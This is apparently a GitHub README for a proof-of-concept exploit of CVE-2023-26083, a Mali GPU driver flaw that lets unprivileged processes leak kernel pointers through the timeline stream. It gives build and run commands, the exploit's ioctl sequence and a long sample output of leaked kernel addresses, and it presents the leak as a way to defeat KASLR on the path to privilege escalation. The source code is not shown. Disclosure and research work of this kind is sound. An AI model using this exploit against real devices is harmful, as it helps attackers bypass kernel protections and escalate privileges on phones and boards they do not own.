Noverisp3/CVE-2023-26083

# CVE-2023-26083 – Mali GPU Kernel Address Leak via Timeline Stream This repository contains a proof-of-concept (PoC) exploit for **CVE-2023-26083**, a vulnerability in the Mali GPU driver (Arm Mali GPU Kernel Driver) that allows an unprivileged user to leak kernel pointers and sensitive internal information via the timeline stream (`/dev/mali0`). ## Vulnerability Overview The Mali GPU driver provides a “timeline stream” (tlstream) feature for profiling and debugging. This stream exports events that contain raw kernel pointers (e.g., addresses of `kbase_context`, `kbase_gpu`, `kbase_lpu`, address spaces, atoms, etc.). Normally, access to this stream should require the `BASE_CONTEXT_CREATE_FLAG_MONITOR` flag. However, due to a missing permission check in the `KBASE_IOCTL_TLSTREAM_ACQUIRE` handler, any process (even without the monitor flag) can obtain a file descriptor to the timeline stream and read kernel memory addresses. **Impact:** - Leaking kernel pointers defeats kernel ASLR (KASLR). - Combined with other vulnerabilities (e.g., use-after-free, arbitrary write), this can lead to privilege escalation or arbitrary kernel code execution. - The leak itself exposes internal driver state and can be used for fingerprinting. ## Affected Versions - Arm Mali GPU Kernel Driver versions prior to the fix for CVE-2023-26083. ## Build & Run ### Prerequisites - A device with a Mali GPU (e.g., Exynos, MediaTek, some Rockchip SoCs). - Root access is **not** required – the PoC works as an unprivileged user. - The kernel must have the Mali driver built-in or as a module (`/dev/mali0` must exist). ### Compilation Since the code is self-contained and standalone, you can easily cross-compile it using standard tools. #### 1. For Android (Recommended) Use the Android NDK toolchain to compile for ARM64 devices. It is highly recommended to use static linking to prevent dynamic linker compatibility issues on different Android versions: aarch64-linux-android21-clang -static -o mali_tlstream_leak mali_tlstream_leak.c #### 2. For ARM-based Linux Desktops/Boards If you are testing on an ARM development board (like Raspberry Pi or Odroid) that has a Mali GPU and runs a standard Linux distro: gcc -static -o mali_tlstream_leak mali_tlstream_leak.c ### Execution ./mali_tlstream_leak The program will: 1. Open `/dev/mali0`. 2. Perform a version check. 3. Set flags to `BASE_CONTEXT_CREATE_FLAG_NONE` (no monitor privilege). 4. Acquire the timeline stream (vulnerable ioctl). 5. Read timeline packets for a few seconds. 6. Parse and display kernel pointer leaks (marked with `*** KERNEL`). ## Example Output **Note:** This Proof-of-Concept (PoC) was tested only on a Samsung Galaxy J7 Prime running Android 8.1.0 (Kernel 3.18) with the April 1, 2020 security patch level. on7xelte:/data/local/tmp $ ./mali_tlstream_leak Version: major=11 minor=5 SET_FLAGS ok TLSTREAM_ACQUIRE ok, tlfd=4 Read 3805 bytes from tlstream (total=3805) Raw hex dump (3805 bytes): 0000: 01 00 00 04 e1 0a 00 00 03 08 20 00 00 00 00 00 0010: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e 0020: 45 57 5f 43 54 58 00 16 00 00 00 6f 62 6a 65 63 0030: 74 20 63 74 78 20 69 73 20 63 72 65 61 74 65 64 0040: 00 05 00 00 00 40 70 49 49 00 10 00 00 00 63 74 0050: 78 2c 63 74 78 5f 6e 72 2c 74 67 69 64 00 01 00 0060: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e 0070: 45 57 5f 47 50 55 00 16 00 00 00 6f 62 6a 65 63 0080: 74 20 67 70 75 20 69 73 20 63 72 65 61 74 65 64 0090: 00 05 00 00 00 40 70 49 49 00 16 00 00 00 67 70 00a0: 75 2c 67 70 75 5f 69 64 2c 63 6f 72 65 5f 63 6f 00b0: 75 6e 74 00 02 00 00 00 11 00 00 00 4b 42 41 53 00c0: 45 5f 54 4c 5f 4e 45 57 5f 4c 50 55 00 16 00 00 00d0: 00 6f 62 6a 65 63 74 20 6c 70 75 20 69 73 20 63 00e0: 72 65 61 74 65 64 00 05 00 00 00 40 70 49 49 00 00f0: 12 00 00 00 6c 70 75 2c 6c 70 75 5f 6e 72 2c 6c 0100: 70 75 5f 66 6e 00 03 00 00 00 12 00 00 00 4b 42 0110: 41 53 45 5f 54 4c 5f 4e 45 57 5f 41 54 4f 4d 00 0120: 17 00 00 00 6f 62 6a 65 63 74 20 61 74 6f 6d 20 0130: 69 73 20 63 72 65 61 74 65 64 00 04 00 00 00 40 0140: 70 49 00 0d 00 00 00 61 74 6f 6d 2c 61 74 6f 6d 0150: 5f 6e 72 00 04 00 00 00 10 00 00 00 4b 42 41 53 0160: 45 5f 54 4c 5f 4e 45 57 5f 41 53 00 20 00 00 00 0170: 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 62 0180: 6a 65 63 74 20 69 73 20 63 72 65 61 74 65 64 00 0190: 04 00 00 00 40 70 49 00 14 00 00 00 61 64 64 72 01a0: 65 73 73 5f 73 70 61 63 65 2c 61 73 5f 6e 72 00 01b0: 05 00 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 01c0: 5f 44 45 4c 5f 43 54 58 00 15 00 00 00 63 6f 6e 01d0: 74 65 78 74 20 69 73 20 64 65 73 74 72 6f 79 65 01e0: 64 00 03 00 00 00 40 70 00 04 00 00 00 63 74 78 01f0: 00 06 00 00 00 12 00 00 00 4b 42 41 53 45 5f 54 Parsing packets: Packet at offset 0: family=TL class=OBJ type=HEADER stream=1 len=2785 numbered=0 Packet at offset 2793: family=TL class=OBJ type=SUMMARY stream=1 len=1004 numbered=0 [NEW_LPU] (ts=104596762668116, 16 bytes payload) ptr0=0xffffffc0baead7f8 *** KERNEL val1=0 val1=526 [NEW_LPU] (ts=104596762668539, 16 bytes payload) ptr0=0xffffffc0baead7fc *** KERNEL val1=1 val1=510 [NEW_LPU] (ts=104596762669039, 16 bytes payload) ptr0=0xffffffc0baead800 *** KERNEL val1=2 val1=126 [NEW_AS] (ts=104596762669654, 12 bytes payload) ptr0=0xffffffc0baeac740 *** KERNEL val1=0 [NEW_AS] (ts=104596762670078, 12 bytes payload) ptr0=0xffffffc0baeac838 *** KERNEL val1=1 [NEW_AS] (ts=104596762670347, 12 bytes payload) ptr0=0xffffffc0baeac930 *** KERNEL val1=2 [NEW_AS] (ts=104596762670539, 12 bytes payload) ptr0=0xffffffc0baeaca28 *** KERNEL val1=3 [NEW_AS] (ts=104596762670847, 12 bytes payload) ptr0=0xffffffc0baeacb20 *** KERNEL val1=4 [NEW_AS] (ts=104596762671001, 12 bytes payload) ptr0=0xffffffc0baeacc18 *** KERNEL val1=5 [NEW_AS] (ts=104596762671154, 12 bytes payload) ptr0=0xffffffc0baeacd10 *** KERNEL val1=6 [NEW_AS] (ts=104596762671462, 12 bytes payload) ptr0=0xffffffc0baeace08 *** KERNEL val1=7 [NEW_GPU] (ts=104596762671808, 16 bytes payload) ptr0=0xffffffc0baeac000 *** KERNEL val1=137363472 val1=1 [LIFELINK_LPU_GPU] (ts=104596762671962, 16 bytes payload) ptr0=0xffffffc0baead7f8 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_LPU_GPU] (ts=104596762672385, 16 bytes payload) ptr0=0xffffffc0baead7fc *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_LPU_GPU] (ts=104596762672578, 16 bytes payload) ptr0=0xffffffc0baead800 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762672924, 16 bytes payload) ptr0=0xffffffc0baeac740 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762673116, 16 bytes payload) ptr0=0xffffffc0baeac838 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762673385, 16 bytes payload) ptr0=0xffffffc0baeac930 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762673539, 16 bytes payload) ptr0=0xffffffc0baeaca28 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762673847, 16 bytes payload) ptr0=0xffffffc0baeacb20 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762674001, 16 bytes payload) ptr0=0xffffffc0baeacc18 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762674154, 16 bytes payload) ptr0=0xffffffc0baeacd10 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [LIFELINK_AS_GPU] (ts=104596762674462, 16 bytes payload) ptr0=0xffffffc0baeace08 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL [NEW_CTX] (ts=104596762674962, 16 bytes payload) ptr0=0xffffff802619e000 *** KERNEL val1=194 val1=12465 [NEW_CTX] (ts=104596762675654, 16 bytes payload) ptr0=0xffffff8025e13000 *** KERNEL val1=193 val1=12116 [NEW_CTX] (ts=104596762676385, 16 bytes payload) ptr0=0xffffff8025bb3000 *** KERNEL val1=192 val1=11342 [NEW_CTX] (ts=104596762677154, 16 bytes payload) ptr0=0xffffff801de1f000 *** KERNEL val1=156 val1=24216 [NEW_CTX] (ts=104596762677885, 16 bytes payload) ptr0=0xffffff801db73000 *** KERNEL val1=150 val1=29044 [NEW_CTX] (ts=104596762678616, 16 bytes payload) ptr0=0xffffff80224ce000 *** KERNEL val1=145 val1=6525 [NEW_CTX] (ts=104596762679693, 16 bytes payload) ptr0=0xffffff801f1f2000 *** KERNEL val1=47 val1=3367 [NEW_CTX] (ts=104596762680385, 16 bytes payload) ptr0=0xffffff801e187000 *** KERNEL val1=36 val1=23263 [NEW_CTX] (ts=104596762681385, 16 bytes payload) ptr0=0xffffff80243c5000 *** KERNEL val1=26 val1=15858 [NEW_CTX] (ts=104596762682193, 16 bytes payload) ptr0=0xffffff8020cff000 *** KERNEL val1=24 val1=4256 [NEW_CTX] (ts=104596762682885, 16 bytes payload) ptr0=0xffffff801f221000 *** KERNEL val1=15 val1=10645 [NEW_CTX] (ts=104596762683654, 16 bytes payload) ptr0=0xffffff801dbca000 *** KERNEL val1=3 val1=2976 [NEW_CTX] (ts=104596762684501, 16 bytes payload) ptr0=0xffffff802b375000 *** KERNEL val1=2 val1=3409 [NEW_CTX] (ts=104596762685039, 16 bytes payload) ptr0=0xffffff8020d88000 *** KERNEL val1=0 val1=2613 As shown, the PoC successfully leaks multiple kernel addresses: - LPU (Logic Processing Unit) objects - Address Space (AS) objects - GPU object - Context objects (kbase_context) ## Code Explanation The key steps are: 1. **Open `/dev/mali0`** – standard Mali device interface. 2. **KBASE_IOCTL_VERSION_CHECK** – required to initialize the driver context. 3. **KBASE_IOCTL_SET_FLAGS** – set create_flags to `BASE_CONTEXT_CREATE_FLAG_NONE` (no monitor privilege). This should normally block tlstream access, but the bug allows bypass. 4. **KBASE_IOCTL_TLSTREAM_ACQUIRE** – obtain a new file descriptor for the timeline stream. Despite the missing monitor flag, the ioctl returns a valid fd. 5. **read()** – read raw timeline packets. 6. **Parser** – decodes the packet header and timeline event messages, extracting kernel pointers. ## Mitigation / Patch Update your kernel to a version that includes the fix for CVE-2023-26083. Alternatively, if you are a manufacturer, apply the patch from Arm or the Linux kernel stable tree. ## Disclaimer **This code is provided for educational and security research purposes only.** Using this exploit on systems without explicit permission may violate applicable laws. The author is not responsible for any misuse or damage caused by this software. Use it only on devices you own or have written authorization to test. ## References - [CVE-2023-26083](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26083) - [NIST NVD - CVE-2023-26083](https://nvd.nist.gov/vuln/detail/cve-2023-26083) ## Author Noveris

标签：客户端加密